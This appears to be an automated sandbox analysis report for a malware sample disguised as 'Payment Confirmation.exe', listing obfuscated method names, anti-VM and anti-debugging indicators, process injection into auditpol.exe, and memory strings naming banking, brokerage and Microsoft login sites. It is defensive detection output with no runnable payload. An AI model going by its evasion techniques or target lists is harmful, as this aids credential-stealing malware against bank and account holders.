                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, GEuX4sz96q2Gv6RX4n.csHigh entropy of concatenated method names: 'G6OBPud4bw', 'X6xBTeVJ0v', 'jRdBtoH4VK', 'BOnBhnxd5U', 'ItOB5UT4VJ', 'yIwB0nVnLb', 'VfmBeSR2or', 'H8UBHbccZ4', 'DORBjQm4n9', 'qOrB104keL'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, JUYqsbMu1RIrlpo2UG.csHigh entropy of concatenated method names: 'MOjiW0SAl4', 'arvi4L22Ok', 'mHwiiQliqL', 'wO1idGKVfL', 'no1iJuVwLd', 'JrjiHL4oDG', 'Dispose', 'gapFQAsrTY', 'VNUFOAQ3Gd', 'K8NFwEIpo3'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, lAGES4SpJBJatUlsbc.csHigh entropy of concatenated method names: 'Ab2qTQbD1X', 'BGnqt7MFmq', 'KPWqh2ZYsr', 'x2Bq5AFA6K', 'ispq0q8tgW', 'eXQqeRP6Di', 'dHlqrGDa8G', 'KbKqVsn2Jj', 'mQkqclUxOr', 'CJtqnCuifV'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.csHigh entropy of concatenated method names: 'T1LOKQnqBx', 'dlrO87vBUO', 'V7cOfya01Q', 'apLOuw5T99', 'aYkOEKSvlI', 'FQVOaeo5o0', 'j9EOM5sbl5', 'nOVO9X87C9', 'qOFOsJuK8M', 'AQeOZCmc0b'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, wPylGIpyjsYxXXTDLB.csHigh entropy of concatenated method names: 'TpPUfmaO47', 'Y7hUudtxiQ', 'bmdUE2CC8q', 'ToString', 'FA7UatwDHl', 'WTPUMGlZKM', 'a3T6YSEaJIuys5qexfu', 'kdmb8EE9WkLw5xmLIV0'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, e1UWDj0Y6JpbC9IK0r.csHigh entropy of concatenated method names: 'RlIUHc4M6x', 'zdeUjaa5Rb', 'GBHUCYYFPr', 'WEgUAYYMBb', 'tolUPc6wgN', 'vl5UxFj3sf', 'KSdUtZXkAO', 'UygUvpWtMX', 'qlDo0RE5cIAJYFOTfwh', 'PxJsDtErISNPYvV7kbL'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, mifPhrsSaQSJZnWLa1.csHigh entropy of concatenated method names: 'PkFihchRuI', 'SHNi5MdXLB', 'dbIi6VB1ma', 'HdTi0A3bfs', 'GcHie8qA6c', 'K68ip4q76T', 'uUjir38spI', 'p3EiV7tejN', 'YY7i7PXM5r', 'dKBicBA7J1'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, yls8CYr4oErVufRAOZ.csHigh entropy of concatenated method names: 'QcrkQ7BTw2', 'CuDkwiVxVt', 'ReukUJfHNk', 'VkxUZidsav', 'DZYUz5AToj', 'hOokNayO63', 'a5UkI659eL', 'VgJk33gs3N', 'CikkyiPPnO', 'ndGkmAgcOV'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, PUl2qBImbK2iC04k9Zj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tZ5Gin40aJ', 'e7NGBSsKyb', 'yZYGdVMSv0', 'yHQGGAkwrI', 'FI0GJptdur', 'l8ZGgbGJwo', 'BC3GHx89uy'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.csHigh entropy of concatenated method names: 'JKMybYRdEp', 'BMRyQi89hG', 'pKdyOc0qQF', 'gT0ywev2xY', 'DfFy2NEs4h', 'WVIyUQTKKR', 'CREykxOh06', 'jEZyDYpMZm', 'aP7yoiXnfd', 'XXxyRhGbPR'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, I5aJRgvLsrpLPEq9AE.csHigh entropy of concatenated method names: 'Lei2YxYTwU', 'RRq2xZxmY8', 'uyew6pfDdb', 'duqw0DT81K', 'aPEwettoou', 'W4DwpA6BlL', 'rjZwrMkpda', 'L6JwVmkaaH', 'elOw7p59Gg', 'QxcwcCEohh'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, hjKklx35Uhx1EMfj7Y.csHigh entropy of concatenated method names: 'lLEC25H5F', 'ATRAEYDps', 'KrrP0IqmA', 'O2WxHHkSU', 'qnht6YvyG', 'uOQvWVUVQ', 'eR9eyMTjH33Y1RW8D1', 'V8RpYIuo5MJQQ0LV4O', 'cCMF4Sb5B', 'pBxBHli3w'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, nyU9IFZh7J5KlB7TRi.csHigh entropy of concatenated method names: 'f1oBwleYYK', 'J0YB29Njtm', 'lTlBUDSm29', 'DSvBk7hitW', 'O5rBiBIIZu', 'feSBDcbGHU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ECEWAAINCMGfgGbkfsn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MSnBnitajS', 'yHbBLwqDhn', 'zsBBS7L8dV', 'tQrBKAqUW7', 'xJxB8p7VIA', 'z8mBfw4G98', 'K12Bu1vIAb'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, Vf0JMHm2U8BDAwXhXB.csHigh entropy of concatenated method names: 'myDIkVqslx', 'DKpID7XX8M', 'f5SIRDycca', 't7jIlc05aJ', 'Uq9IWAE2aW', 'L1LIXbhY09', 'PmrFH9iwBTMPPqEvTg', 'dQs17lKBDAxXc6wwok', 'nFSF0vtoSoUEBJMSq1', 'gPFII2Ilnn'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, b1HwNtfm82y8F2LUjH.csHigh entropy of concatenated method names: 'ToString', 'jTpXnI6i1K', 'zcbX5I00G9', 's3PX6VK2rC', 'X9fX0n62Q3', 'cfqXeersv5', 'jGZXpf7IDl', 'fEPXrA0vbo', 'XZnXV79Nih', 'Lt9X7ugGr2'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, srxEJNII30ifhve8Jbm.csHigh entropy of concatenated method names: 'rxqBZiQowd', 'QBkBzyGfKH', 'BPtdNVPl7F', 'FhFdIOLyK6', 'PHZd3j88BV', 'EP9dyMxWu5', 'Ot0dmukyDd', 'jYbdbRsQ6C', 'zDOdQucvKy', 'zIVdORCSVy'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, haWV1LhbhY09vg95RU.csHigh entropy of concatenated method names: 'j6tUb7x7KB', 'RS4UOI7WwG', 'rfYU2iyj17', 'Xk4Ukty769', 'IVHUD95PjD', 'yMu2EdtBFm', 'gC02a895km', 'ytB2MJjo4v', 'V1O29bAxh8', 'HKP2sx0kxf'
                Source: 3.2.Payment Confirmation.exe.33ac828.0.raw.unpack, RXv2gXFWfOHdOu5o4x.csHigh entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
                Source: 3.2.Payment Confirmation.exe.33ac828.0.raw.unpack, gaWNLGnov1rlIG3v4D.csHigh entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Payment Confirmation.exe PID: 7724, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD324
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD7E4
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD944
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD504
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD544
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7AD1E4
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7B0154
                Source: C:\Windows\SysWOW64\auditpol.exeAPI/Special instruction interceptor: Address: 7FF84F7ADA44
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: 97F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: A7F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: AA10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: BA10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1096E rdtsc 7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeWindow / User API: threadDelayed 1304Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeWindow / User API: threadDelayed 8669Jump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\auditpol.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment Confirmation.exe TID: 7708Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exe TID: 7888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028Thread sleep count: 1304 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028Thread sleep time: -2608000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028Thread sleep count: 8669 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028Thread sleep time: -17338000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008Thread sleep time: -51000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\auditpol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331C9F0 FindFirstFileW,FindNextFileW,FindClose,10_2_0331C9F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: f37-37I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: f37-37I.10.drBinary or memory string: discord.comVMware20,11696428655f
                Source: f37-37I.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6'
                Source: f37-37I.10.drBinary or memory string: global block list test formVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696428655|UE
                Source: f37-37I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: f37-37I.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: f37-37I.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: f37-37I.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: f37-37I.10.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20k4u
                Source: f37-37I.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731393012.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1844478894.000002765BE1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: f37-37I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696428655x
                Source: f37-37I.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: f37-37I.10.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: f37-37I.10.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: f37-37I.10.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: f37-37I.10.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: f37-37I.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20w&
                Source: f37-37I.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696428655x
                Source: f37-37I.10.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: f37-37I.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: f37-37I.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1096E rdtsc 7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00417D93 LdrLoadDll,7_2_00417D93
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA197 mov eax, dword ptr fs:[00000030h]7_2_019CA197
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA197 mov eax, dword ptr fs:[00000030h]7_2_019CA197
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA197 mov eax, dword ptr fs:[00000030h]7_2_019CA197
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8C188 mov eax, dword ptr fs:[00000030h]7_2_01A8C188
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8C188 mov eax, dword ptr fs:[00000030h]7_2_01A8C188
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A10185 mov eax, dword ptr fs:[00000030h]7_2_01A10185
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A74180 mov eax, dword ptr fs:[00000030h]7_2_01A74180
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A74180 mov eax, dword ptr fs:[00000030h]7_2_01A74180
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5019F mov eax, dword ptr fs:[00000030h]7_2_01A5019F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5019F mov eax, dword ptr fs:[00000030h]7_2_01A5019F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5019F mov eax, dword ptr fs:[00000030h]7_2_01A5019F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5019F mov eax, dword ptr fs:[00000030h]7_2_01A5019F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA61E5 mov eax, dword ptr fs:[00000030h]7_2_01AA61E5
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A001F8 mov eax, dword ptr fs:[00000030h]7_2_01A001F8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A961C3 mov eax, dword ptr fs:[00000030h]7_2_01A961C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A961C3 mov eax, dword ptr fs:[00000030h]7_2_01A961C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h]7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A00124 mov eax, dword ptr fs:[00000030h]7_2_01A00124
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h]7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A90115 mov eax, dword ptr fs:[00000030h]7_2_01A90115
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov ecx, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6154 mov eax, dword ptr fs:[00000030h]7_2_019D6154
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6154 mov eax, dword ptr fs:[00000030h]7_2_019D6154
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC156 mov eax, dword ptr fs:[00000030h]7_2_019CC156
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4164 mov eax, dword ptr fs:[00000030h]7_2_01AA4164
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4164 mov eax, dword ptr fs:[00000030h]7_2_01AA4164
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov ecx, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A68158 mov eax, dword ptr fs:[00000030h]7_2_01A68158
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A680A8 mov eax, dword ptr fs:[00000030h]7_2_01A680A8
